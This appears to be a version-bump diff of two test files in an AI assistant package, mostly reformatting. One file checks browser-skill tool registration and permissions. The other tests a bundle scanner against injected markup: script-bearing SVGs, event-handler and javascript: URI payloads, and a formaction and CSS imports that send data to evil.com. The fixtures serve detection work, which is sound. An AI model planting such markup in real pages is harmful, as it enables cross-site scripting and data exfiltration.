@vellumai/assistant 0.4.17 → 0.4.18

package/src/__tests__/browser-skill-endstate.test.ts

@@ -4,65 +4,70 @@
  * Locks the final invariants from the BROWSER_SKILL plan so that future
  * changes cannot silently regress any of the migration guarantees.
  */
-import { afterAll,beforeAll, describe, expect, test } from 'bun:test';
+import { afterAll, beforeAll, describe, expect, test } from "bun:test";
 
-import { projectSkillTools, resetSkillToolProjection } from '../daemon/session-skill-tools.js';
-import { getDefaultRuleTemplates } from '../permissions/defaults.js';
+import {
+  projectSkillTools,
+  resetSkillToolProjection,
+} from "../daemon/session-skill-tools.js";
+import { getDefaultRuleTemplates } from "../permissions/defaults.js";
 import {
   __resetRegistryForTesting,
   getAllToolDefinitions,
   getAllTools,
   initializeTools,
-} from '../tools/registry.js';
-import { eagerModuleToolNames } from '../tools/tool-manifest.js';
+} from "../tools/registry.js";
+import { eagerModuleToolNames } from "../tools/tool-manifest.js";
 import {
   BROWSER_SKILL_ID,
   BROWSER_TOOL_COUNT,
   BROWSER_TOOL_NAMES,
   buildSkillLoadHistory,
-} from './test-support/browser-skill-harness.js';
+} from "./test-support/browser-skill-harness.js";
 
-afterAll(() => { __resetRegistryForTesting(); });
+afterAll(() => {
+  __resetRegistryForTesting();
+});
 
-describe('browser skill migration end-state', () => {
+describe("browser skill migration end-state", () => {
   beforeAll(async () => {
     __resetRegistryForTesting();
     await initializeTools();
   });
 
   const BROWSER_TOOLS = [
-    'browser_navigate',
-    'browser_snapshot',
-    'browser_screenshot',
-    'browser_close',
-    'browser_click',
-    'browser_type',
-    'browser_press_key',
-    'browser_scroll',
-    'browser_select_option',
-    'browser_hover',
-    'browser_wait_for',
-    'browser_extract',
-    'browser_wait_for_download',
-    'browser_fill_credential',
+    "browser_navigate",
+    "browser_snapshot",
+    "browser_screenshot",
+    "browser_close",
+    "browser_click",
+    "browser_type",
+    "browser_press_key",
+    "browser_scroll",
+    "browser_select_option",
+    "browser_hover",
+    "browser_wait_for",
+    "browser_extract",
+    "browser_wait_for_download",
+    "browser_fill_credential",
   ] as const;
 
   // ── 1. Startup payload excludes browser tools ──────────────────────
 
-  test('browser tools are NOT in startup core registry', () => {
+  test("browser tools are NOT in startup core registry", () => {
     const toolNames = getAllTools().map((t) => t.name);
     for (const name of BROWSER_TOOLS) {
       expect(toolNames).not.toContain(name);
     }
   });
 
-  test('browser tool names are NOT in eagerModuleToolNames', () => {
+  test("browser tool names are NOT in eagerModuleToolNames", () => {
     for (const name of BROWSER_TOOLS) {
       expect(eagerModuleToolNames).not.toContain(name);
     }
   });
 
-  test('startup tool definition count is reduced (no browser tools)', () => {
+  test("startup tool definition count is reduced (no browser tools)", () => {
     const definitions = getAllToolDefinitions();
     // Startup has ~15 eager + ~11 explicit definitions (no browser tools).
     // Allow wider drift for unrelated tool additions while still failing if
@@ -84,19 +89,25 @@ describe('browser skill migration end-state', () => {
 
   // ── 2. Browser skill exists and is active ──────────────────────────
 
-  test('bundled browser skill directory exists with SKILL.md and TOOLS.json', async () => {
-    const path = await import('node:path');
-    const fs = await import('node:fs');
-    const skillDir = path.resolve(import.meta.dirname, '../config/bundled-skills/browser');
-    expect(fs.existsSync(path.join(skillDir, 'SKILL.md'))).toBe(true);
-    expect(fs.existsSync(path.join(skillDir, 'TOOLS.json'))).toBe(true);
+  test("bundled browser skill directory exists with SKILL.md and TOOLS.json", async () => {
+    const path = await import("node:path");
+    const fs = await import("node:fs");
+    const skillDir = path.resolve(
+      import.meta.dirname,
+      "../config/bundled-skills/browser",
+    );
+    expect(fs.existsSync(path.join(skillDir, "SKILL.md"))).toBe(true);
+    expect(fs.existsSync(path.join(skillDir, "TOOLS.json"))).toBe(true);
   });
 
-  test('browser TOOLS.json contains all 14 tools', async () => {
-    const path = await import('node:path');
-    const fs = await import('node:fs');
-    const toolsPath = path.resolve(import.meta.dirname, '../config/bundled-skills/browser/TOOLS.json');
-    const manifest = JSON.parse(fs.readFileSync(toolsPath, 'utf-8'));
+  test("browser TOOLS.json contains all 14 tools", async () => {
+    const path = await import("node:path");
+    const fs = await import("node:fs");
+    const toolsPath = path.resolve(
+      import.meta.dirname,
+      "../config/bundled-skills/browser/TOOLS.json",
+    );
+    const manifest = JSON.parse(fs.readFileSync(toolsPath, "utf-8"));
     expect(manifest.version).toBe(1);
     expect(manifest.tools).toHaveLength(14);
     const toolNames = manifest.tools.map((t: { name: string }) => t.name);
@@ -107,47 +118,54 @@ describe('browser skill migration end-state', () => {
 
   // ── 3. Permission defaults align with PR 08/09 ────────────────────
 
-  test('skill_load has default allow rule', () => {
+  test("skill_load has default allow rule", () => {
     const templates = getDefaultRuleTemplates();
-    const rule = templates.find((t) => t.id === 'default:allow-skill_load-global');
+    const rule = templates.find(
+      (t) => t.id === "default:allow-skill_load-global",
+    );
     expect(rule).toBeDefined();
-    expect(rule!.decision).toBe('allow');
+    expect(rule!.decision).toBe("allow");
   });
 
-  test('all browser tools have default allow rules', () => {
+  test("all browser tools have default allow rules", () => {
     const templates = getDefaultRuleTemplates();
     for (const tool of BROWSER_TOOLS) {
-      const rule = templates.find((t) => t.id === `default:allow-${tool}-global`);
+      const rule = templates.find(
+        (t) => t.id === `default:allow-${tool}-global`,
+      );
       expect(rule).toBeDefined();
-      expect(rule!.decision).toBe('allow');
+      expect(rule!.decision).toBe("allow");
       // browser_navigate uses standalone "**" globstar because navigate
       // candidates contain URLs with "/" (e.g. "browser_navigate:https://example.com/path").
-      const expectedPattern = tool === 'browser_navigate' ? '**' : `${tool}:*`;
+      const expectedPattern = tool === "browser_navigate" ? "**" : `${tool}:*`;
       expect(rule!.pattern).toBe(expectedPattern);
     }
   });
 
   // ── 4. Tool wrapper scripts exist ──────────────────────────────────
 
-  test('all 14 browser tool wrapper scripts exist', async () => {
-    const path = await import('node:path');
-    const fs = await import('node:fs');
-    const toolsDir = path.resolve(import.meta.dirname, '../config/bundled-skills/browser/tools');
+  test("all 14 browser tool wrapper scripts exist", async () => {
+    const path = await import("node:path");
+    const fs = await import("node:fs");
+    const toolsDir = path.resolve(
+      import.meta.dirname,
+      "../config/bundled-skills/browser/tools",
+    );
     const wrapperFiles = [
-      'browser-navigate.ts',
-      'browser-snapshot.ts',
-      'browser-screenshot.ts',
-      'browser-close.ts',
-      'browser-click.ts',
-      'browser-type.ts',
-      'browser-press-key.ts',
-      'browser-scroll.ts',
-      'browser-select-option.ts',
-      'browser-hover.ts',
-      'browser-wait-for.ts',
-      'browser-extract.ts',
-      'browser-wait-for-download.ts',
-      'browser-fill-credential.ts',
+      "browser-navigate.ts",
+      "browser-snapshot.ts",
+      "browser-screenshot.ts",
+      "browser-close.ts",
+      "browser-click.ts",
+      "browser-type.ts",
+      "browser-press-key.ts",
+      "browser-scroll.ts",
+      "browser-select-option.ts",
+      "browser-hover.ts",
+      "browser-wait-for.ts",
+      "browser-extract.ts",
+      "browser-wait-for-download.ts",
+      "browser-fill-credential.ts",
     ];
     for (const file of wrapperFiles) {
       expect(fs.existsSync(path.join(toolsDir, file))).toBe(true);
@@ -156,30 +174,37 @@ describe('browser skill migration end-state', () => {
 
   // ── 5. Execution extraction is in place ────────────────────────────
 
-  test('browser-execution.ts exists with exported execute functions', async () => {
-    const path = await import('node:path');
-    const fs = await import('node:fs');
-    const execPath = path.resolve(import.meta.dirname, '../tools/browser/browser-execution.ts');
+  test("browser-execution.ts exists with exported execute functions", async () => {
+    const path = await import("node:path");
+    const fs = await import("node:fs");
+    const execPath = path.resolve(
+      import.meta.dirname,
+      "../tools/browser/browser-execution.ts",
+    );
     expect(fs.existsSync(execPath)).toBe(true);
-    const content = fs.readFileSync(execPath, 'utf-8');
+    const content = fs.readFileSync(execPath, "utf-8");
     // browser_wait_for_download uses a standalone wrapper that calls
     // browserManager.waitForDownload() directly — no execute* function.
     const TOOLS_WITH_EXECUTE_FN = BROWSER_TOOLS.filter(
-      (name) => name !== 'browser_wait_for_download',
+      (name) => name !== "browser_wait_for_download",
     );
     for (const name of TOOLS_WITH_EXECUTE_FN) {
       // Derive expected function name: browser_navigate -> executeBrowserNavigate
-      const fnName = 'execute' + name
-        .split('_')
-        .map((s, i) => (i === 0 ? 'Browser' : s.charAt(0).toUpperCase() + s.slice(1)))
-        .join('');
+      const fnName =
+        "execute" +
+        name
+          .split("_")
+          .map((s, i) =>
+            i === 0 ? "Browser" : s.charAt(0).toUpperCase() + s.slice(1),
+          )
+          .join("");
       expect(content).toContain(fnName);
     }
   });
 
   // ── 6. Runtime projection adds exactly 14 browser tools ──────────
 
-  test('skill_load projection adds all 14 browser tools', () => {
+  test("skill_load projection adds all 14 browser tools", () => {
     const history = buildSkillLoadHistory(BROWSER_SKILL_ID);
     const tracking = new Map<string, string>();
 

package/src/__tests__/bundle-scanner.test.ts

@@ -1,8 +1,8 @@
 import { mkdtemp, rm } from "node:fs/promises";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
+import { afterAll, beforeAll, describe, expect, test } from "bun:test";
 
-import { afterAll,beforeAll, describe, expect, test } from "bun:test";
 import JSZip from "jszip";
 
 import { scanBundle, type ScanFinding } from "../bundler/bundle-scanner.js";
@@ -47,12 +47,18 @@ async function createBundle(
   }
 
   const data = await zip.generateAsync({ type: "uint8array" });
-  const path = join(tempDir, `test-${Date.now()}-${Math.random().toString(36).slice(2)}.vellumapp`);
+  const path = join(
+    tempDir,
+    `test-${Date.now()}-${Math.random().toString(36).slice(2)}.vellumapp`,
+  );
   await Bun.write(path, data);
   return path;
 }
 
-function findByCode(findings: ScanFinding[], code: string): ScanFinding | undefined {
+function findByCode(
+  findings: ScanFinding[],
+  code: string,
+): ScanFinding | undefined {
   return findings.find((f) => f.code === code);
 }
 
@@ -64,7 +70,8 @@ describe("SVG script tags", () => {
   test("blocks SVG with <script> tag", async () => {
     const path = await createBundle({
       "index.html": "<html><body>Hello</body></html>",
-      "assets/icon.svg": '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
+      "assets/icon.svg":
+        '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "svg_script");
@@ -75,7 +82,8 @@ describe("SVG script tags", () => {
   test("passes clean SVG without script", async () => {
     const path = await createBundle({
       "index.html": "<html><body>Hello</body></html>",
-      "assets/icon.svg": '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40"/></svg>',
+      "assets/icon.svg":
+        '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40"/></svg>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "svg_script");
@@ -90,7 +98,8 @@ describe("SVG script tags", () => {
 describe("iframe srcdoc", () => {
   test("blocks iframe with srcdoc attribute", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><iframe srcdoc="<script>alert(1)</script>"></iframe></body></html>',
+      "index.html":
+        '<html><body><iframe srcdoc="<script>alert(1)</script>"></iframe></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "iframe_srcdoc");
@@ -100,7 +109,8 @@ describe("iframe srcdoc", () => {
 
   test("passes HTML without srcdoc", async () => {
     const path = await createBundle({
-      "index.html": "<html><body><iframe src=\"about:blank\"></iframe></body></html>",
+      "index.html":
+        '<html><body><iframe src="about:blank"></iframe></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "iframe_srcdoc");
@@ -115,7 +125,8 @@ describe("iframe srcdoc", () => {
 describe("formaction attribute", () => {
   test("blocks formaction with external URL", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><button formaction="https://evil.com/steal">Submit</button></body></html>',
+      "index.html":
+        '<html><body><button formaction="https://evil.com/steal">Submit</button></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "formaction_external");
@@ -125,7 +136,8 @@ describe("formaction attribute", () => {
 
   test("passes form without formaction", async () => {
     const path = await createBundle({
-      "index.html": "<html><body><form action=\"#\"><button>Submit</button></form></body></html>",
+      "index.html":
+        '<html><body><form action="#"><button>Submit</button></form></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "formaction_external");
@@ -140,7 +152,8 @@ describe("formaction attribute", () => {
 describe("HTML event handlers", () => {
   test("warns on onerror attribute", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><img onerror="alert(1)" src="x"></body></html>',
+      "index.html":
+        '<html><body><img onerror="alert(1)" src="x"></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "html_event_handler");
@@ -150,7 +163,8 @@ describe("HTML event handlers", () => {
 
   test("warns on onclick attribute", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><div onclick="doStuff()">Click</div></body></html>',
+      "index.html":
+        '<html><body><div onclick="doStuff()">Click</div></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "html_event_handler");
@@ -160,7 +174,8 @@ describe("HTML event handlers", () => {
 
   test("passes HTML without event handlers", async () => {
     const path = await createBundle({
-      "index.html": "<html><body><div class=\"container\">Safe</div></body></html>",
+      "index.html":
+        '<html><body><div class="container">Safe</div></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "html_event_handler");
@@ -175,7 +190,8 @@ describe("HTML event handlers", () => {
 describe("CSS @import", () => {
   test("warns on @import url()", async () => {
     const path = await createBundle({
-      "index.html": "<html><head><style>@import url(https://evil.com/spy.css);</style></head><body></body></html>",
+      "index.html":
+        "<html><head><style>@import url(https://evil.com/spy.css);</style></head><body></body></html>",
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "css_import");
@@ -185,7 +201,8 @@ describe("CSS @import", () => {
 
   test("warns on @import with quoted URL", async () => {
     const path = await createBundle({
-      "index.html": "<html><head><style>@import 'https://evil.com/spy.css';</style></head><body></body></html>",
+      "index.html":
+        "<html><head><style>@import 'https://evil.com/spy.css';</style></head><body></body></html>",
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "css_import");
@@ -194,7 +211,8 @@ describe("CSS @import", () => {
 
   test("passes without CSS @import", async () => {
     const path = await createBundle({
-      "index.html": "<html><head><style>body { color: red; }</style></head><body></body></html>",
+      "index.html":
+        "<html><head><style>body { color: red; }</style></head><body></body></html>",
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "css_import");
@@ -209,7 +227,8 @@ describe("CSS @import", () => {
 describe("CSS external url()", () => {
   test("warns on url() with https", async () => {
     const path = await createBundle({
-      "index.html": "<html><head><style>body { background: url('https://evil.com/pixel.gif'); }</style></head><body></body></html>",
+      "index.html":
+        "<html><head><style>body { background: url('https://evil.com/pixel.gif'); }</style></head><body></body></html>",
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "css_external_url");
@@ -219,7 +238,8 @@ describe("CSS external url()", () => {
 
   test("passes url() with local path", async () => {
     const path = await createBundle({
-      "index.html": "<html><head><style>body { background: url('assets/bg.png'); }</style></head><body></body></html>",
+      "index.html":
+        "<html><head><style>body { background: url('assets/bg.png'); }</style></head><body></body></html>",
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "css_external_url");
@@ -234,7 +254,8 @@ describe("CSS external url()", () => {
 describe("data: URI", () => {
   test("warns on script src with data: URI", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><script src="data:text/javascript,alert(1)"></script></body></html>',
+      "index.html":
+        '<html><body><script src="data:text/javascript,alert(1)"></script></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "data_uri");
@@ -259,7 +280,8 @@ describe("data: URI", () => {
 describe("javascript: URI", () => {
   test("warns on href with javascript: URI", async () => {
     const path = await createBundle({
-      "index.html": '<html><body><a href="javascript:alert(1)">Click</a></body></html>',
+      "index.html":
+        '<html><body><a href="javascript:alert(1)">Click</a></body></html>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "javascript_uri");
@@ -285,7 +307,8 @@ describe("SVG event handlers", () => {
   test("warns on SVG with onload handler", async () => {
     const path = await createBundle({
       "index.html": "<html><body>Hello</body></html>",
-      "assets/icon.svg": '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><circle cx="50" cy="50" r="40"/></svg>',
+      "assets/icon.svg":
+        '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"><circle cx="50" cy="50" r="40"/></svg>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "svg_event_handler");
@@ -296,7 +319,8 @@ describe("SVG event handlers", () => {
   test("warns on SVG element with onclick handler", async () => {
     const path = await createBundle({
       "index.html": "<html><body>Hello</body></html>",
-      "assets/icon.svg": '<svg xmlns="http://www.w3.org/2000/svg"><circle onclick="alert(1)" cx="50" cy="50" r="40"/></svg>',
+      "assets/icon.svg":
+        '<svg xmlns="http://www.w3.org/2000/svg"><circle onclick="alert(1)" cx="50" cy="50" r="40"/></svg>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "svg_event_handler");
@@ -306,7 +330,8 @@ describe("SVG event handlers", () => {
   test("passes clean SVG without event handlers", async () => {
     const path = await createBundle({
       "index.html": "<html><body>Hello</body></html>",
-      "assets/icon.svg": '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40" fill="red"/></svg>',
+      "assets/icon.svg":
+        '<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="40" fill="red"/></svg>',
     });
     const result = await scanBundle(path);
     const f = findByCode(result.findings, "svg_event_handler");